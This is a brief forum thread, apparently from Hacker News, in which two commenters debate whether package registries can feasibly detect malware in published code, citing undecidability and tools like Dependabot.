(no title)
kjok | 5 months ago
This distinction matters. Malware detection is, in the general case, an undecidable problem (think halting problem and Rice theorem). No amount of static or dynamic scanning can guarantee catching malicious logic in arbitrary code. At best, scanners detect known signatures, patterns, or anomalies. They can't prove absence of malicious behavior.
So the reality is: if Google's assurance artifacts stop short of claiming automated malware detection is feasible, it's a stretch for anyone else to suggest registries could achieve it "if they just had more resources." The problem space itself is the blocker, not just lack of infra or resources.
motorest|5 months ago
I think this sort of thought process is misguided.
We do see continuous, ecosystem-wide scanning and detection pipelines. For example, GitHub does support DependaBot, which runs supply chain checks.
https://github.com/dependabot
What you don't see is magical rabbits being pulled out of top hats. The industry has decades of experience with anti-malware tools in contexts where said malware runs in spite of not being explicitly provided deployment or execution permissions. And yet it deploys and runs. What do you expect if you make code intentionally installable and deployable, and capable of sending HTTP requests to send and receive any kind of data?
Contrary to what you are implying, this is not a simple problem with straight-forward solutions. The security model has been highly reliant on the role of gatekeepers, both in producer and consumer sides. However, the last batch of popular supply chain attacks circumvented the only failsafe in place. Beyond this point, you just have a module that runs unspecified code, just like any other module.